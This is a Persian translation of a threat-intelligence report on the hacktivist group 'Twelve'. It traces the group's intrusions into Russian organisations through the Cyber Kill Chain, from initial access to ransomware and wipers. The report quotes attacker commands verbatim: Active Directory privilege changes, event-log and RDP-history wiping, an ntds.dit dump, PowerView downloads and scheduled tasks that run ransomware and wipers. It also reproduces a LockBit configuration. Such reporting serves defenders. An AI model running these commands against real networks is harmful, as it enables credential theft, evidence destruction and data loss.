روابط عمومی شرکت ایدکو (توزیع‌کننده‌ی محصولات کسپرسکی در ایران)؛  بهار 2024، پست‌هایی با داده‌های واقعی افراد شروع به ظاهر شدن روی کانال تلگرامی «دوازده» کرد. خیلی زود این کانال به دلیل نقض قوانین سرویس تلگرام مسدود شد. این گروه چندین ماه بدون اینکه توجه‌ها را به خود جلب کند باقی ماند اما پی بردیم که از همان تکنیک‌های دوازده استفاده کرده و به سرورهای C2 مرتبط با این عامل تهدید متکی بوده. از این رو مطمئنیم این گروه همچنان فعال است و شاید بزودی دوباره شروع به فعالیت کند. در این مقاله قصد داریم از متودولوژی زنجیره‌ کشتار سایبری (Cyber Kill Chain) برای تحلیل اقدامات مهاجمین استفاده کنیم. با ما همراه باشید.

در مورد «دوازده»

این گروه آوریل 2023 در بطن درگیری روسیه و اوکراین شکل گرفت و از آن زمان به سازمان‌های دولت روسیه حمله کرد. این نشان می‌دهد هدف اصلی آن وارد کردن هر چه بیشتر آسیب است. موقع حمله، این گروه هدفش رسیدن به دارایی‌های مهم است اما همیشه هم در این امر موفق نمی‌شود. افزون بر این، دوازده از سیستم‌های قربانی اطلاعات حساس استخراج کرده و آن را روی کانال تلگرام نشر می‌کند. جالب اینجاست که دوازده، زیرساخت، ابزارها و تکنیک‌ها (TTPها) را با گروه باج‌افزاری DARKSTAR که پیشتر با نام  Shadow یا COMET معروف بود به اشتراک می‌گذارد. این نشان می‌دهد هر دو به یک سندیکا یا خوشه فعلیت متعلق هستند. در عین حال، گرچه اقدامات دوازده واضحاً ماهیتی هکتیویستی دارد اما DARKSTAR به الگوی کلاسیک اخاذی دوگانه پایبند است. این تنوع اهداف در سندیکا بر پیچیدگی و تنوع تهدیدهای سایبری مدرن تاکید می‌کند.

زنجیره کشتار سایبری: مرحله اولیه

مرحله اولیه قوانین نجیره کشتار سایبری به فازهای ابتدایی یک حمله سایبری با هددف دسترسی به LAN سازمان هدف اشاره دارد. این فازها شامل دامنه‌ای از اقدامات تاکتیکی می‌شوند: از عملیات شناسایی خارجی گرفته تا فرض کنترل سیستم‌های داخل شبکه محافظت‌شده.

عملیات شناسایی

گرچه دقیق نمی‌دانیم عامل تهدید از چه تکنیک‌های عملیات شناسایی استفاده می‌کند اما ظن‌مان بر این است که آن‌ها آدرس‌های آی‌پی روسیه را بر اساس ژئوتگ‌ها اسکن کرده و سعی دارند سرورهای وی‌پی‌ان و اپ‌هایی را که از اینترنت قابل‌دسترسی‌اند شناسایی کنند؛ اپ‌هایی که می‌توانند در قالب نقاط ورودی در زیرساخت سازمان تارگت یا کنتراکتور استفاده شوند.

توسعه منابع

حین تحلیل حملات سایبری، پی بردیم عامل تهدید منحصراً به ابزارهای شناخته‌شده با دسترسی آزاد متکی بوده است. ابزارهایی که این گروه اغلب استفاده می‌کند عبارتند از Cobalt Strike, mimikatz, chisel, BloodHound, PowerView, adPEAS, CrackMapExec, Advanced IP Scanner و PsExec.

دسترسی و تحویل اولیه

در بیشتر حملاتی که از آن‌ها خبر داریم، دشمن با اکانت‌های معتبر لوکال یا دامنه، وی‌پی‌ان یا گواهی‌های SSH به زیرساخت قربانی دسترسی اولیه پیدا کرد. بعد از دسترسی به زیرساخت قربانی، مهاجمین برای حرکت جانبی از پروتکل دسکتاپ ریموت (RDP) استفاده کردند. بیشتر وقت‌ها، مهاجمین با برخی کنتراکتورهای قربانی به زیرساخت تارگت نفوذ کردند. برای انجام این کار آن‌ها به زیرساخت کنتراکتور دسترسی پیدا کرده و بعد از گواهی آن برای وصل شدن به وی‌پی‌ان مشتری‌اش استفاده کردند. دشمن با دسترسی به آن می‌تواند به سیستم‌های مشتری با RDP وصل شده و به زیرساخت مشتری نفوذ کند.

اکسپلویت

وب‌شل‌ها

ما با تحلیل سرورهای وب که مهاجمین دستکاری‌شان کرده بودند تعداد زیادی وب‌شل کشف کردیم. مسیرهای یافت‌شده چنین شکلی داشتند:

/home/bitrix/ext_www/[REDACTED]/assets/images/

/home/bitrix/ext_www/[REDACTED]/bitrix/templates/.default/ajax/images/

/home/bitrix/ext_www/[REDACTED]/bitrix/admin/

همه‌ی وب شل‌ها به زبان PHP نوشته شده بودند و نام‌های رندوم داشتند:

 

F6d098f417.php, 3425b29f4e.php, ecb2979be7.php, 04116e895b.php, 7784ba76e2.php,

a4daa72a70.php, 5146d22914.php, 001d7a.php, 8759c7.php, 48a08b.php, 6f99ac.php,

82f5f4.php, 0dd37d.php, 6bceb2.php, d0af43.php

 

آن‌ها می‌توانند اهداف مختلفی داشته باشند: برخی دستورات دلخواه را اجرا برخی دیگر فایل‌ها را جابه‌جا می‌کردند و برخی دیگر ایجاد و ارسال ایمیل داشتند. شایان ذکر است که اکثر وب‌شل‌های مورد استفاده توسط عوامل تهدید، ابزارهای در دسترس عموم هستند که می توانند در منابع در دسترس عموم یافت شوند. در اینجا دو نمونه وجود دارد:

 

https://github[.]com/stefanpejcic/wordpress-malware؛

https://github[.]com/tennc/webshell/blob/master/php/wso/wso2.php.

 

ما از مثال یک ریمیلر (اسکریپت برای ارسال ایمیل) برای بررسی نحوه عملکرد وب‌شل‌ها استفاده می‌کنیم. مهاجمین از این اسکریپت PHP برای ارسال پیام‌های ایمیل استفاده کردند. این با بررسی داده‌های مورد نیاز، مانند آدرس گیرنده، موضوع و متن پیام در یک درخواست POST شروع می‌شود. اگر هر یک از داده‌های کلیدی گم شده باشد، اسکریپت یک خطا را گزارش می‌کند و خارج می‌شود. پس از بررسی موفقیت آمیز و آماده سازی اجزای ایمیل، از تابع () PHP برای ارسال ایمیل استفاده می‌کند.

بک‌در FaceFish

رخدادی که ما بررسی کردیم مربوط به بک‌در FaceFish بود که با کمک یک وب‌شل نصب‌شده روی سرور VMware vCenter با سوء استفاده از آسیب پذیری‌های CVE-2021-21972 و CVE-2021-22005 در پلت فرم مجازی‌سازی vSphere بارگذاری شد. آسیب‌پذیری اول را می‌توان در کلاینت پلتفرم یافت. این امکان اجرای کد از راه دور را می‌دهد اما دومی یک آسیب‌پذیری دلخواه بارگذاری فایل در سرور است. مانند بسیاری از پوسته های وب مورد استفاده توسط گروه، این مورد نیز به صورت عمومی در دسترس است.

https://github[.]com/NS-Sp4ce/CVE-2021-21972/tree/main/payload/Linux

در مسیر زیر در سیستم آلوده قرار داشت:

/usr/lib/vmware-vsphere-ui/server/static/resources/libs/shell.jsp

 

پس از شروع، FaceFish یک کتابخانه مشترک libs.so را در سیستم ذخیره می‌کند، آن را با روش ld.so.preload به فرآیند sshd تزریق و سرویس SSH را مجدداً راه‌اندازی می‌کند.

ماندگاری

برای سفت کردن جای پایش در زیرساخت دامنه، دشمن از پاورشل برای افزودن کاربران و گروه‌های دامنه و تغییر ACL (لیست‌های کنترل دسترسی) برای اشیاء Active Directory استفاده کرد. در زیر لیستی از دستورات PowerShell که آنها اجرا کرده‌اند آمده است.

Add-DomainGroupMember -Identity [REDACTED] -Members 'EXCHANGE WINDOWS PERMISSIONS'

Add-DomainGroupMember -Identity [REDACTED] -Members 'Organization Management'

Add-DomainGroupMember -Identity [REDACTED] -Members "EXCHANGE WINDOWS PERMISSIONS"

Add-DomainObjectAcl -Rights 'All' -TargetIdentity "users" -PrincipalIdentity "engineers"

Add-DomainObjectAcl -Rights 'All' -TargetIdentity "dc1" -PrincipalIdentity "users"

Add-DomainObjectAcl -Rights 'All' -TargetIdentity "dc1" -PrincipalIdentity "userasdasdasds"

Set-DomainObject -Credential $Cred -Identity [REDACTED]-SET @{serviceprincipalname='nonexistent/BLAHBLAH'}

 

مهاجمین همچنین حساب‌های دامنه و گروه‌های کاربری را با ابزار سیستم net.exe اضافه کردند.

net user [REDACTED] engineers /domain /add

net group [REDACTED] engineers /domain /add

net group engineers [REDACTED] /domain /add

net group engineers 'EXCHANGE WINDOWS PERMISSIONS' /add /domain

net group 'engineers' 'EXCHANGE WINDOWS PERMISSIONS' /add /domain

net group engineers /domain

net group users /domain

net group "Domain Administrators" [REDACTED] /add /domain

افزون بر این، سعی کردند بدافزار را از طریق زمان‌بندی‌گرِ تسک و خط‌مشی‌های دستکاری‌شده گروه جهت ذخیره تسک‌های آلوده برای کل دامنه توزیع و اجرا کنند.

دور زدن لایه‌های دفاعی

برای جلوگیری از شناسایی، مهاجمین هویت بدافزارها و تسک‌های خود را زیر نام‌های محصولات یا سرویس‌های موجود پنهان کردند.

C:\Windows\System32\Tasks\run

C:\Windows\System32\Tasks\Update Microsoft

C:\Windows\System32\Tasks\Yandex

C:\Windows\System32\Tasks\YandexUpdate

C:\Windows\SYSVOL_DFSR\domain\scripts\intel.exe

 

آنها همچنین از طیف وسیعی از تکنیک‌ها برای پنهان کردن آثار فعالیت خود استفاده کردند. به طور خاص، آنها گزارش‌های رویداد را با ابزار سیستم wevtutil.exe در انواع مختلف پوسته فرمان پاک کردند.

powershell-command wevtutil el|Foreach-Object{Write-Host Clearing$_;wevtutil cl$_

C:\Windows\system32\cmd.EXE" /c for /F "tokens=*" %1 in ('wevtutil.exe el') DO

wevtutil.exe cl "%1

 

افزون بر این، مهاجمین از اسکریپتی که تاریخچه کانکشن RDP را پاک کرد برای از بین بردن آثار استفاده از RDPشان، داکیومنت‌های اخیر و فهرست فایل‌های اجراشده استفاده کردند.

@echo off

reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f

reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f

reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"

attrib -s -h %userprofile%\documents\Default.rdp

del %userprofile%\documents\Default.rdp

del /f /s /q /a %AppData%\Microsoft\Windows\Recent\AutomaticDestinations

reg delete "HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/RunMRU" /va /f

فرمان وکنترل

در یکی از حملات این گروه، ما ردپایی از چارچوب Cobalt Strike را کشف کردیم که مهاجمین از آن برای تماس با C2 خود و توزیع بارهای مخرب استفاده می‌کردند. ابزار را در مسیر زیر پیدا کردیم:

\users\{username}\pictures\photos_delo\loop.exe

دشمن همچنین از ابزارهای سیستم curl و wget برای ارائه ابزارهای مختلف به میزبان‌های در معرض خطر استفاده کرد.

wget https://github[.]com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

curl https://github[.]com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

زنجیره کشتار سایبری: میانه راه

مرحله میانی از نظر زنجیره کشتار سایبری یکپارچه به اقدامات دشمن در یک شبکه هدف قبلاً در معرض خطر اطلاق می شود که هدف آن دسترسی به سیستم‌ها و داده های بیشتری است که مهاجم برای دستیابی به اهداف خود به آنها نیاز دارد. این مرحله شامل یک سری مراحل طراحی‌شده برای انتشار در سراسر شبکه و دسترسی به دارایی‌های حیاتی می‌شود.

انحراف مسیر

دشمن از ngrok برای تونل کردن ترافیک استفاده کرد. آنها آن ابزار را بلافاصله پس از اتصال به سیستم نصب کردند و پورت 3389 ( پورت استاندارد RDP) را در فایل پیکربندی تنظیم کردند. پس از آن، تمام اتصالات نامشروع به سیستم از طریق RDP از طریق ngrok انجام شد. مهاجمین این ابزار را با دستور زیر به سرویسی به نام svchost متصل کردند:

C:\ProgramData\svchost\svchost.exe service run --config

C:\ProgramData\svchost\svchost.yml

C:\ProgramData\svchost\ یک دایرکتوری بود که توسط مهاجمین ایجاد شد. فایل svchost.exe خود ngrok است، در حالیکه svchost.yml به عنوان فایل پیکربندی آن عمل می‌کند. علاوه بر شماره پورت، حاوی یک نشانه مجوز است که چنین حالتی دارد:

 2YXVHSiK9hhc4aKCbH4i6BLh21J_6zwxt***********. توکن ها بین نمونه ها متفاوت هستند.

مقدار ::::%16777216 در قسمت آدرس شبکه منبع، در گزارش رویداد RDP نشان می‌دهد که مهاجمین اتصالات خود را از طریق ngrok آغاز کرده‌اند.

کشف

دسمن از آی‌پی اسکنر پیشرفته، BloodHound و adPEAS برای شناسایی LAN و زیرساخت دامنه استفاده کرد؛ همینطور برای بررسی ارتباط بین دامنه‌ها. Advanced IP Scanner می‌تواند بسرعت همه دستگاه‌ها را روی شبکه مورد نظر شناسایی کند. BloodHound برای تجزیه و تحلیل و تجسم کاربران و سیستم‌های مورد اعتماد دامنه و شناسایی مسیرهایی با کمترین مقاومت برای افزایش امتیاز استفاده می‌شود. adPEAS برای حمله به Active Directory، شناسایی نقص‌های پیکربندی و شناسایی راه‌هایی برای افزایش امتیازات دامنه استفاده می‌شود. در مجموع، این ابزارها به مهاجمین اجازه می‌دهد تا به طور موثر شبکه‌های محلی قربانیان را بررسی و از آنها سوء استفاده کنند. علاوه بر این، این گروه از cmdlet‌های ماژول PowerView برای کشف حساب‌های کاربری دامنه استفاده کرد.

Get-DomainObject users

Get-ADUsers users

Get-ADUser users

Get-ADUser -Filter * -SearchBase "[REDACTED OU]"

Get-ADUser -Filter * -SearchBase "[REDACTED OU]" | findstr Name

این گروه از پاورشل برای دسترسی به داده‌های گروه‌های دامنه استفاده کرد:

Get-ADGroup

Get-ADGroup "EXCHANGE WINDOWS PERMISSIONS"

Get-ADGroupMember "EXCHANGE WINDOWS PERMISSIONS"

Get-ADGroupMember "engineers"

Get-DomainGroupMember engineers

Get-DomainGroupMember skzi

ارتقای مزیت

برای افزایش امتیازات، دشمن در درجه اول از اعتبار قانونی کاربران با امتیازات دسترسی مدیریتی استفاده می‌کرد. علاوه بر این، آنها از ماژول PowerView برای اصلاح ویژگی‌های حساب‌های جدیدی که برای دستیابی به اهداف خود تنظیم کرده‌اند استفاده کردند:

Add-DomainObjectAcl-Rights'All'

پارامتر -Rights 'All' به حساب کاربری دسترسی کامل به شیء مشخص‌شده را می‌دهد. این ممکن است شامل اجازه خواندن، نوشتن، ایجاد، حذف و انجام عملیات‌های مختلف روی شیء باشد.

اجرا

اسکریپت‌ها و فرمان‌ها

دشمن از مفسرهای سیستم و ابزارهای در دسترس عموم و همچنین اسکریپت‌های bat. و پاورشل خودنوشته برای انجام اقدامات مختلف در سیستم استفاده کرد.

در زیر نمونه‌هایی از اسکریپت‌های حمله را که کشف کردیم آورده شده است:

gpo.ps1

Sophos_kill_local.ps1

Logon.bat

CleanRDPHistory.bat

c:\intel\GPO.bat

\\netlogon\logon.bat

c:\intel\test.ps1

\\netlogon\u.bat

\SYSVOL\domain\scripts\outlookconf2003.ps1

فهرست دستورات اجراشده توسط حریف که در لاگ PowerShell ثبت شده است، نشان می‌دهد که آنها جلسات فعال PowerShell را روی میزبان‌هایی که به آن‌ها حمله کرده‌اند شروع کرده‌اند، و همچنین به فرد ایده‌ای از سطح شایستگی اپراتور می‌دهد.

لیستی از دستوراتی را که مهاجمین در تلاش برای وارد کردن ماژول PowerView اجرا کردند، در زیر مشاهده کنید.

impot .\PowerView.ps1

import .\PowerView.ps1

Import-Module .\PowerView.ps1

cd C:\Users\Public\Documents

Import-Module .\PowerView.ps1

Set-ExecutionPolicy bypass

Import-Module .\PowerView.ps1

 

Sophos_kill_local.ps1

اسکریپتی که ما شناسایی کردیم تلاش می‌کند فرآیندهای Sophos را در رایانه خاتمه دهد و نتایج را در فایل‌های گزارش محلی و راه دور می‌نویسد.

با استفاده از Task Scheduler (درست‌کننده جدول زمانیِ تسک)

برای انجام تمام اقدامات مخرب نهایی، مانند راه‌اندازی باج‌افزار و پاک‌کن‌ها، دشمن از وظایف Scheduler استفاده کرد که با اصلاح سیاست‌های گروه تنظیم شده بود. این امر به دشمن امکان می‌دهد تا این موارد را همزمان روی همه ماشین‌های موجود در دامنه اجرا کند.

نام تسک	خط فرمان	شرح
Dead1	reg:\\REGISTRY\MACHINE\SOF TWARE\Microsoft\Windows NT\CurrentVersion\Schedule \TaskCache\Tasks\{9042DCD8 -***}:Actions”,”cmd.exe /c c:\programdata\twelve.exe -pass ***	اجرای باج‌افزار از طریق CLI و عبور پسورد به عنوان آرگومان
Dead2	reg:\\REGISTRY\MACHINE\SOF TWARE\Microsoft\Windows NT\CurrentVersion\Schedule \TaskCache\Tasks\{AB35C377 -***}:Actions”,”cmd.exe /c \\[DOMAIN]\netlogon\wiper. exe”	لانچ وایپر از طریق CLI از اشتراک شبکه نت لاگ
12lock	“reg:\\REGISTRY\MACHINE\SOF TWARE\Microsoft\Windows NT\CurrentVersion\Schedule \TaskCache\Tasks\{A131C020 -***}:Actions”,”powershell .exe Copy-Item  \\[DOMAIN]\netlogon\wiper .exe -Destination C:\ProgramData	کپی کردن فایل وایپر با PowerShell از اشتراک شبکه netlogon به میزبان لوکال در C:\ProgramData
12lock 1	reg:\\REGISTRY\MACHINE\SOF TWARE\Microsoft\Windows NT\CurrentVersion\Schedule \TaskCache\Tasks\{0B177D41 -***}:Actions","cmd.exe /c \\[DOMAIN]\netlogon\twelve .exe -pass ***");	اجرای باج‌افزار از اشتراک شبکه نت لاگ از طریق CLI و ارسال رمز عبور به عنوان آرگومان
Copywiper	reg:\\REGISTRY\MACHINE\SOF TWARE\Microsoft\Windows NT\CurrentVersion\Schedule \TaskCache\Tasks\{FB72DE3D -***}:Actions،"POWERSHELL EXECopy-Item \\[DOMAIN]\netlogon\twelv e.exe-Destination C:\ProgramData`	کپی کردن فایل باج‌افزار با PowerShell از اشتراک شبکه netlogon به میزبان محلی در C:\ProgramData
run	powershell -ex bypass -f \\[DOMAIN]\netlogon\outloo kconf2003.ps1	اجرای یک اسکریپت پاورشل که سیاست‌های گروه را تغییر می‌دهد
YandexUpdate	\\[DOMAIN]\netlogon\12.exe -pass **************	اجرای باج‌افزار از اشتراک شبکه نت لاگ و ارسال رمز عبور به عنوان آرگومان
Update Microsoft	C:\ProgramData\intel.exe	لانچ وایپر

 

دسترسی به اطلاعات محرمانه

مهاجم برای رسیدن به اطلاعات محرمانه کاربر از mimikatz استفاده کرد. آن‌ها این فایل ابزار را تحت نام calculator.exe پنهان کردند تا هدف اصلی‌اش برملا نشود. با این وجود زحمت تغییر آیکون پیش‌فرض آن را به خود ندادند. مهاجمین از  mimikatz برای راه‌اندازیِ تَلّی از اطلاعات محرمانه‌ی لوکال از مموری پروسه lsass.exe استفاده کردند.

ما مصنوعاتی پیدا کردیم که نشان می‌دهند از mimikatz بر روی میزبان‌های در معرض خطر استفاده شده است، هم در قالب یک فایل اجرایی و هم یک اسکریپت پاورشل.  دشمن علاوه بر تخلیه lsass.exe با mimikatz، اطلاعات محرمانه لوکال را با جمع کردن شاخه‌های رجیستری SYSTEM، SAM و SECURITY با ابزار سیستم reg.exe به دست آورد و آنها را برای بایگانی و حذف بعدی در پوشه Downloads ذخیره کرد. مهاجمین همچنین سعی کردند به اعتبار دامنه دسترسی پیدا کنند. برای انجام این کار، آنها از ابزار سیستم ntdsutil.exe برای تخلیه ntds.dit استفاده کردند. دستوری که ntds.dit را تخلیه می‌کند در زیر نشان داده شده است:

$system32\ntdsutil.exe",""$system32\ntdsutil.exe" "ac i ntds" ifm "create full

c:\temp" q q

 

برای استخراج اعتبار اضافی از سیستم، مهاجمین سپس از نسخه کنسول ابزار All-In-One Password Recovery Pro XenArmor استفاده کردند که می‌تواند بیشتر اعتبار یک کاربر را از hives رجیستری استخراج کند.

دستور جمع آوری داده‌ها با All-In-One Password Recovery Pro در زیر نشان داده شده است:

c:\programdata\update\xenallpasswordpro.exe"  -a

"c:\programdata\update\report.html"

 

حرکت جانبی

برای حرکت در زیرساخت قربانی، دشمن از اطلاعات محرمانه لوکال و دامنه به دست آمده در مراحل قبلی حمله استفاده کرد. در بیشتر موارد، آنها از طریق پروتکل دسکتاپ از راه دور  RDP) ) با استفاده از فایل اجرایی mstsc.exe به دستگاه‌های جدید در شبکه قربانی متصل می‌شوند. آنها گاهی اوقات از PsExec برای حرکت در سراسر شبکه از طریق SMB و از دستور Enter-PSSession برای شروع یک جلسه تعاملی با رایانه‌های راه دور در شبکه استفاده می‌کنند؛ یک ویژگی PowerShell برای مدیریت و اجرای دستورات در سیستم‌های راه دور با کمک ریموت پاورشل.

Enter-PSSession یک سشن موقت تعاملی بین سیستم‌های محلی و راه دور ایجاد می‌کند و به دشمن اجازه می‌دهد تا دستورات PowerShell را مستقیماً بر روی ماشین های راه دور اجرا کند، گویی آنها را به صورت محلی اجرا نموده. فرآیند ارتباط معمولاً از پروتکل WS-Management در بالای HTTP یا HTTPS استفاده می‌کند.

زنجیره کشتار سایبری: مرحله خروج

مرحله خروج از نظر زنجیره کشتار سایبری، اقدامات غایی دشمن را بعد از اینکه با موفقیت به شبکه تارگت نفوذ کرد و به همه سیستم‌ها و داده‌هایی که دنبالش می‌گشتند دسترسی پیدا کرد شرح می‌دهد. این مرحله تمرکزش بر رسیدن به اهداف نهایی حمله است؛ که می‌تواند شامل سرقت داده، خرابکاری یا سایر اقداماتی شود که در نهایت دستکاریِ CIA (محرمانگی، یکپارچگی و موجودیت[1]) دارایی‌های اطلاعاتی قربانی را به همراه دارد.

جمع‌آوری

مهاجم مقادیر قابل توجهی از اطلاعات حساس در مورد قربانیان خود را جمع آوری کرد: اسناد مالی، نقشه‌های فنی، ایمیل شرکتی و غیره. آنها از 7z برای آرشیو داده‌هایی که جمع‌آوری کرده‌اند استفاده و داده‌ها را از طریق سرویس‌های اشتراک‌گذاری کلود ارسال کردند. همچنین در طول حملات خود، دشمن پوشه داده تلگرام tdata) ) را بایگانی و از آن خارج کرد. این پوشه حاوی فایل‌های رسانه‌ای (تصاویر، ویدئو، صدا)، پیام‌ها، استیکرها و اسنادی است که کاربر از طریق تلگرام ارسال یا دریافت کرده است. داده‌ها را می توان برای دسترسی سریع بدون نیاز به بارگیری مجدد فایل ها از سرورها استفاده کرد. پوشه tdata همچنین حاوی فایل‌های سشن است که به برنامه اجازه می‌دهد بدون نیاز به وارد کردن مجدد لاگین و رمز عبور، به برنامه به طور خودکار به حساب متصل شود.

 

دشمنی که به این پوشه دسترسی پیدا می‌کند می‌تواند پیام‌های خصوصی، فایل‌های رسانه‌ای و اسناد را استخراج کند که منجر به درز اطلاعات شخصی یا تجاری حساس می‌شود. فرد شرور می‌تواند از فایل‌های سشن و کلیدهای رمزگذاری برای دور زدن احراز هویت هنگام ورود به حساب تلگرام، خواندن چت‌ها و جعل هویت قربانی هنگام ارسال پیام استفاده کند.

استخراج

حریف آرشیوهای حاوی اطلاعات مورد علاقه خود را از طریق یک مرورگر در https://dropmefiles.net/ آپلود کرد. وقتی هدر صفحه را که زده بود «آپلود موفقیت‌آمیز بود- dropmefiles.net» در کش مرورگر پس از حمله پیدا کردیم متوجه شدیم DropMeFiles همان سرویس اشتراک‌گذاری فایلی بوده که آن‌ها استفاده می‌کردند.

اثر

باج‌افزار

مهاجمین از نسخه‌ای از باج‌افزار محبوب LockBit 3.0 که از کد منبع در دسترس عموم جمع‌آوری شده بود، برای رمزگذاری داده‌ها استفاده کردند. ما فایل های باج افزار را در مسیرهای زیر شناسایی کردیم:

\ProgramData\;

\\netlogon\.

نام فایل‌های زیر در رخدادهای شناخته‌شده مربوط به باج افزار LockBit 3.0 مشخص شده است.

دوازده.exe;

1. exe;
2. exe;

enc.exe؛

betta.exe;

sed.exe;

svo.exe.

همانطور که قبلاً در بخش اجرا ذکر شد، باج‌افزار از سیاست‌های گروهی برای گسترش در زیرساخت‌های قربانیان خود استفاده می‌کند. مهاجمن از پاورشل رای انتقال فایل باج‌افزار به اشتراک شبکه netlogon استفاده و سپس یک اسکریپت را برای اصلاح سیاست‌های گروه اجرا کردند.

 

powershell.exe -ex bypass -f C:\Users\Public\gpo.ps1

1

powershell.exe -ex bypass -f C:\Users\Public\gpo.ps1

پس از به‌روزرسانی خط‌مشی‌ها، آن‌ها وظایف برنامه‌ریزی‌شده را در همه رایانه‌های دامنه برای کپی و اجرای باج‌افزار تنظیم کردند.

ابتدا، باج‌افزار از اشتراک شبکه netlogon به فهرست محلی ProgramData توسط وظیفه Copywiper به شرح زیر منتقل شد:

powershell.exe Copy-Item `\\[DOMAIN]\netlogon\twelve.exe` -Destination `C:\ProgramData`

1

powershell.exe Copy-Item `\\[DOMAIN]\netlogon\twelve.exe` -Destination `C:\ProgramData`

پس از این، آنها باج افزار را از یک پوشه محلی یا اشتراک شبکه از طریق CLI شروع و یک رمز عبور منحصر به فرد را به عنوان آرگومان -pass تعیین کردند:

cmd.exe` /c c:\programdata\twelve.exe -pass ************

1

cmd.exe` /c c:\programdata\twelve.exe -pass ************

الگوریتم باج‌افزار به فایل پیکربندی درون‌سازه‌ای بستگی داد. جدول زیر پیکربندی تروجان مربوطه را نشان می‌دهد که در همه نمونه‌های یافت‌شده از سمت ما یکسان بودند:

پارامتر	معناش	شرح
encrypt_mode	اتوماتیک	حالت رمزگذاری را برای فایل های حجیم تنظیم کنید. این یکی از دو مقدار را می‌گیرد: "خودکار" یا "سریع".
encrypt_filename	درست	رمزگذاری نام فایل
impersonation	غلط	استفاده از حساب‌های فهرست شده در فایل پیکربندی برای افزایش امتیازات
skip_hidden_folders	غلط	عبور از دایرکتوری‌های پنهان
language_check	غلط	چک کردن سیستم داخلی
local_disks	درست	رمزگذاری درایوهای لوکال
network_shares	درست	رمزگذاری دایرکتوری‌های شبکه
kill_processes	درست	پایان پروسه‌ها
kill_processes	درست	توقف سرویس‌ها
running_one	درست	بررسی اینکه فقط یک فرآیند باج افزار در حال اجرا باشد
print_note	غلط	پرینت میزان باج
set_wallpaper	غلط	تغییر تصویر پس‌زمینه دسکتاپ
set_icons	غلط	تغییر آیکون‌های فایل‌های رمزگذاری‌شده
send_report	غلط	ارسال اطلاعات سیستم به C2
self_destruct	درست	از بین بردن خود وقعی که کار انجام شد
kill_defender	درست	توقف ویندوز دیفندر
wipe_freespace	غلط	پر کردن تمام فضای دیسک موجود را با فایل موقت حاوی داده‌های
psexec_netspread	غلط	توزیع در سراسر شبکه با سرویس  PsExec
gpo_netspread	غلط	توزیغ از طریق سیاست‌های گروهی در سراسر شبکه
gpo_ps_update	درست	استفاده از پاورشل برای آپدیت سیاست‌های گروه در همه دامنه‌ها
shutdown_system	غلط	ریستارت سیستم
delete_eventlogs	درست	پاک کردن لاگ‌های سیستم
delete_gpo_delay	0	حذف تعلیقی سیاست گروه. ارزش این پارامتر زمانی به تأخیر انداختن را شرح می‌دهد.

 

قبل از شروع کار، باج‌افزار فرآیندهایی را که ممکن است در رمزگذاری فایل‌های فردی اختلال ایجاد کند، خاتمه می‌دهد. نام فرآیندهایی که باید خاتمه داده شوند در زیر فهرست شده‌اند:

sql	oracle	ocssd	dlsnmp	synctime
agntsvc	isqlplussvc	xfssvccon	mydesktopservice	ocautoupds
encsvc	firefox	tbirdconfig	mydesktopqos	ocomm
dbeng50	sqbcoreservice	excel	infopath	msaccess
mspub	onenote	outlook	powerpnt	steam
thebat	thunderbird	visio	winword	wordpad
notepad	calc	wuauclt	onedrive

 

جالب اینجاست که پیکربندی برای ایجاد یادداشت باج هیچ گونه تماس یا روشی برای دسترسی به مهاجمین ندارد. یادداشت پایانی فقط از لوگوی گروه تشکیل شده است.همچنین متوجه شدیم که در برخی موارد، مهاجمین از یک تروجان ساخته‌شده از یک سازنده لو رفته برای باج افزار Chaos برای رمزگذاری فایل‌ها استفاده می‌کردند. ما نمونه‌هایی از آن باج افزار را در مسیرهای زیر کشف کردیم:

 

c:\netlogon\enc.exe

c:\Users\User\enc.exe

c:\Windows\System32\config\systemprofile\appdata\roaming\twelve.exe

c:\Windows\sysvol\domain\scripts\enc.exe

موتور Attribution Threat Kaspersky تشخیص میدهد که یکی از این نمونه ها 60٪ شباهت به Chaos دارد. در زمان کشف نمونه‌ها توسط ما، هنوز مشخص نبود دستان پشت پرده رخدادهایی که در آن‌ها این موارد استفاده می‌شدند کیست اما تحلیل ایستا نشان داد کد حاوی خطوط شخصیتی بوده که نمونه‌ها را به گروه دوازده می‌رسانده!

وایپرها

علاوه بر باج افزار، دشمن از برف وایپرها برای از بین بردن زیرساخت‌های قربانیان خود استفاده کرد. آنها معمولاً پس از رمزگذاری فایل ها، وایپرها را اجرا می‌کردند. وایپری پیدا کردیم از کد منبع در دسترس عموم جمع آوری شده بود. وایپر رکورد اصلی بوت  MBR) ) را روی درایوهای متصل بازنویسی می‌کند، بنابراین هنگامی که قربانی دستگاه را روشن می‌کند، پیامی روی صفحه ظاهر شده اما سیستم عامل بارگذاری نمی شود. سپس فایل به صورت بازگشتی از هر دایرکتوری، به جز اطلاعات ویندوز و حجم سیستم، در همه درایوهای نصب شده عبور نموده و برای هر فایل کارهای زیر را انجام می‌دهد:

• بازنویسی محتویات فایل با بایت‌هایی که به طور تصادفی تولید شده‌اند.
• بازنویسی ابرداده فایل: بازنشانی اندازه و تنظیم تصادفی تاریخ های ایجاد/تغییر/باز شدن.
• اختصاص نام تصادفی به فایل و حذف آن

پس از اتمام، فایل مخرب خود را حذف کرده و سیستم را خاموش می‌کند. بعد از تجزیه و تحلیل پویا و استاتیک خود را انجام دادیم، به این نتیجه رسیدیم که نسخه وایپر با نسخه در دسترس عموم یکسان است. همچنین هنگام تحقیق در مورد حملات دوازده، نسخه دیگری از وایپر را کشف کردیم. نمونه با Shamoon یکسان بود، به جز تعدادی از توابع تغییر نام خاص.

در حین بررسی حملات گروه، فایل‌های وایپر را در مسیرهای زیر یافتیم:

\دسکتاپ\;

\ProgramData\;

\\netlogon\.

نام فایل‌های زیر در رخدادهای شناخته شده مربوط به وایپر مشخص شده است:

intel.exe؛

mail.exe;

wiper.exe.

